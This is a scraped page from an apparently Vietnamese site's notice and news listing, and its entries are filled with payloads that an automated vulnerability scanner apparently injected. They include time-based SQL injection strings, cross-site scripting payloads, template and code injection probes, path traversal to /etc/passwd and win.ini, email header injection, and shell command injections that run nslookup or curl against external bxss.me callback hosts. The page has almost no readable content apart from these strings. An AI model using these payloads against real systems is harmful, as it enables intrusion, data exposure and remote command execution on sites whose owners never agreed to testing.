1 1
1 1
@@tPxAw 1
1����%2527%2522 1
1'" 1
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||' 1
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15) 1
OQeNdX5X')) OR 544=(SELECT 544 FROM PG_SLEEP(15))-- 1
v8CM9p74') OR 263=(SELECT 263 FROM PG_SLEEP(15))-- 2
irI9az6N' OR 646=(SELECT 646 FROM PG_SLEEP(15))-- 1
-1)) OR 779=(SELECT 779 FROM PG_SLEEP(15))-- 1
-5) OR 908=(SELECT 908 FROM PG_SLEEP(15))-- 1
-5 OR 182=(SELECT 182 FROM PG_SLEEP(15))-- 1
vHy2LgU2')); waitfor delay '0:0:15' -- 1
e1fQAuz2'); waitfor delay '0:0:15' -- 1
ufd5irHv'; waitfor delay '0:0:15' -- 1
1 waitfor delay '0:0:15' -- 1
-1)); waitfor delay '0:0:15' -- 1
-1); waitfor delay '0:0:15' -- 1
-1; waitfor delay '0:0:15' -- 1
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/ 1
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z 1
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z 1
if(now()=sysdate(),sleep(15),0) 1
-1" OR 2+769-769-1=0+0+0+1 -- 1
-1' OR 2+28-28-1=0+0+0+1 or '6juptjQH'=' 1
-1' OR 2+486-486-1=0+0+0+1 -- 2
-1 OR 2+519-519-1=0+0+0+1 1
-1 OR 2+28-28-1=0+0+0+1 -- 1
ssRbSyBs 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 2
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1<aFU9RtI< 1
1 1
1<img sRc='http://attacker-9181/log.php? 1
1<aLojJIa x=9407> 1
1<ifRAme sRc=9031.com></IfRamE> 1
1<WSDLPG>RIT5D[!+!]</WSDLPG> 1
1T3eK4 <ScRiPt >XG21(9661)</ScRiPt> 1
1}body{zzz:Expre/**/SSion(XG21(9101))} 1
<a HrEF=jaVaScRiPT:> 1
1 1
<a HrEF=http://xss.bxss.me></a> 1
1<input autofocus onfocus=XG21(9799)> 1
�<img zzz onmouseover=XG21(97181) //�> 1
1&lt;ScRiPt&gt;XG21(9475)&lt;/sCripT&gt; 1
1\u003CScRiPt\XG21(9692)\u003C/sCripT\u003E 2
%31%3C%53%63%52%69%50%74%20%3E%58%47%32%31%289067%29%3C%2F%73%43%72%69%70%54%3E 1
1<img/src=">" onerror=alert(9236)> 1
1 1
1<img src=xyz OnErRor=XG21(9461)> 1
1<img src=//xss.bxss.me/t/dot.gif onload=XG21(9284)> 1
1<body onload=XG21(9951)> 1
1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9326'> 1
1<isindex type=image src=1 onerror=XG21(9987)> 1
1<svg �onload=XG21(9502);> 1
1<ScRiPt >XG21(9899)</ScRiPt> 2
1 1
1<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9351></ScRiPt> 1
1<ScRiPt >XG21(9104)</ScRiPt> 1
1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%58%47%32%31%28%39%35%31%36%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E 1
1<script>XG21(9923)</script>9923 1
1<script>XG21(9959)</script> 1
1<WGKCCD>6JZVL[!+!]</WGKCCD> 1
1<ScRiPt >XG21(9480)</ScRiPt> 1
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o") 1
dfb__${98991*97996}__::.x 1
dfb[[${98991*97996}]]xca 1
dfb{{98991*97996}}xca 1
1 1
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%> 1
1 1
1 1
<th:t="${dfb}#foreach 1
1 1
<%={{={@{#{${dfb}}%> 1
bfgx5859%C0%BEz1%C0%BCz2a%90bcxhjl5859 1
bfg9953%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl9953 1
19075546 1
'"()&%<zzz><ScRiPt >XG21(9470)</ScRiPt> 1
1 1
1'"()&%<zzz><ScRiPt >XG21(9794)</ScRiPt> 1
1"||sleep(27*1000)*xxzlfm||" 1
1 1
1'||sleep(27*1000)*sipvka||' 1
1"&&sleep(27*1000)*jjwhzc&&" 1
1'&&sleep(27*1000)*hrrqam&&' 1
'"() 1
1 1
<!-- 1
1 1
'" 1
1 1
1
1 1
1
1 1
1 1
1 1
1 1
1 1
1 1
xfs.bxss.me 1
'.print(md5(31337)).' 1
${@print(md5(31337))}\ 1
'+'A'.concat(70-3).concat(22*4).concat(113).concat(84).concat(101).concat(88)+(require'socket' Socket.gethostbyname('hitir'+'fnuwbvvb5e616.bxss.me.')[3].to_s)+' 1
1
${@print(md5(31337))} 1
1 1
1
";print(md5(31337));$a=" 1
1 1
1 1
1 1
';print(md5(31337));$a=' 1
"+"A".concat(70-3).concat(22*4).concat(100).concat(66).concat(116).concat(87)+(require"socket" Socket.gethostbyname("hitit"+"xqtlfdfbabb9e.bxss.me.")[3].to_s)+" 1
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7')); 1
1 1
bxss.me/t/xss.html?%00 1
1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
HttP://bxss.me/t/xss.html?%00 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
".gethostbyname(lc("hitap"."zpfdkcpeacd5d.bxss.me."))."A".chr(67).chr(hex("58")).chr(111).chr(66).chr(113).chr(76)." 1
'.gethostbyname(lc('hitas'.'tbrspnqibef9b.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(121).chr(87).chr(107).chr(80).' 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
bxss.me 1
c:/windows/win.ini 1
1 1
/etc/shells 1
http://bxss.me/t/fit.txt%3F.jpg 1
1 1
Http://bxss.me/t/fit.txt 1
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg 1
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
^(#$!@#$)(()))****** 1
1 1
1 1
1 1
1 1
1 1
1 1
!(()&&!|*|*| 1
1 1
;(nslookup -q=cname hitzhnrafehvtc4d3f.bxss.me||curl hitzhnrafehvtc4d3f.bxss.me)|(nslookup -q=cname hitzhnrafehvtc4d3f.bxss.me||curl hitzhnrafehvtc4d3f.bxss.me)&(nslookup -q=cname hitzhnrafehvtc4d3f.bxss.me||curl hitzhnrafehvtc4d3f.bxss.me) 1
1 1
1 1
`(nslookup -q=cname hitztpiwcqqmh0ec49.bxss.me||curl hitztpiwcqqmh0ec49.bxss.me)` 1
1 1
1 1
|(nslookup -q=cname hitpkixjxfqzf10653.bxss.me||curl hitpkixjxfqzf10653.bxss.me) 1
1 1
&(nslookup -q=cname hitkwasmthpcjfd572.bxss.me||curl hitkwasmthpcjfd572.bxss.me)&'\"`0&(nslookup -q=cname hitkwasmthpcjfd572.bxss.me||curl hitkwasmthpcjfd572.bxss.me)&`' 1
) 1
&nslookup -q=cname hitnqyeorfrxnbce62.bxss.me&'\"`0&nslookup -q=cname hitnqyeorfrxnbce62.bxss.me&`' 1
1 1
$(nslookup -q=cname hitkoexujaffg9e00a.bxss.me||curl hitkoexujaffg9e00a.bxss.me) 1
1 1
(nslookup -q=cname hitwkknglqbmca4497.bxss.me||curl hitwkknglqbmca4497.bxss.me)) 1
1|echo svlxwr$()\ bkmnzx\nz^xyu||a #' |echo svlxwr$()\ bkmnzx\nz^xyu||a #|" |echo svlxwr$()\ bkmnzx\nz^xyu||a # 1
|echo zdthlq$()\ bbhzrf\nz^xyu||a #' |echo zdthlq$()\ bbhzrf\nz^xyu||a #|" |echo zdthlq$()\ bbhzrf\nz^xyu||a # 1
1 1
1&echo dkqshi$()\ hoqtlg\nz^xyu||a #' &echo dkqshi$()\ hoqtlg\nz^xyu||a #|" &echo dkqshi$()\ hoqtlg\nz^xyu||a # 1
1 1
1 1
&echo tllilx$()\ twfpnh\nz^xyu||a #' &echo tllilx$()\ twfpnh\nz^xyu||a #|" &echo tllilx$()\ twfpnh\nz^xyu||a # 1
1 1
1 1
1 1
1 1
echo axthxt$()\ obchly\nz^xyu||a #' &echo axthxt$()\ obchly\nz^xyu||a #|" &echo axthxt$()\ obchly\nz^xyu||a # 1
1 1
1 1
1 1
1 1
${10000112+9999884} 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1<esi:include src="http://bxss.me/rpb.png"/> 1
1 1
1 1
1 1
1 1
1 1
../1 1
1 1
file:///etc/passwd 1
../../../../../../../../../../../../../../windows/win.ini 1
../../../../../../../../../../../../../../etc/passwd 1
1 1
1 1
1 1
1 1
to@example.com>%0d%0abcc:009247.36527-158849.36527.02c47.19824.2@bxss.me 1
1 1
1%0abcc:009247.36527-158848.36527.02c47.19824.2@bxss.me 1
1 1
1 1
1 1
12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡 1
1 1
1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
"+response.write(9602418*9097390)+" 1
1 1
'+response.write(9602418*9097390)+' 1
1 1
response.write(9602418*9097390) 1
1 1
1 1
1 1
1 1
1 1
/../../../../../../../../../../windows/system32/BITSADMIN.exe 1
1 1
1 1
1 1
1BeeIxvyczO 1
1 1
1 1
1 1
1 1
1 1

Thông báo

1
 • 4/12/2024 3:45:44 AM 17
1
 • 4/12/2024 3:45:44 AM 18
1
 • 4/12/2024 3:45:41 AM 16

Tin mới nhất

1
 • 4/12/2024 3:57:34 AM 8
1
 • 4/12/2024 3:57:21 AM 8
1
 • 4/12/2024 3:57:09 AM 13
1
 • 4/12/2024 3:57:09 AM 17

Thông tin hội thảo
ngoài trường

1
 • 4/12/2024 4:02:55 AM 13
1
 • 4/12/2024 4:02:39 AM 16
@@V7xdV
 • 4/12/2024 4:02:20 AM 13

Thông tin NCKH
ngoài trường

1
 • 4/12/2024 4:30:17 AM 13
1
 • 4/12/2024 4:30:11 AM 12
@@wsy2i
 • 4/12/2024 4:30:03 AM 14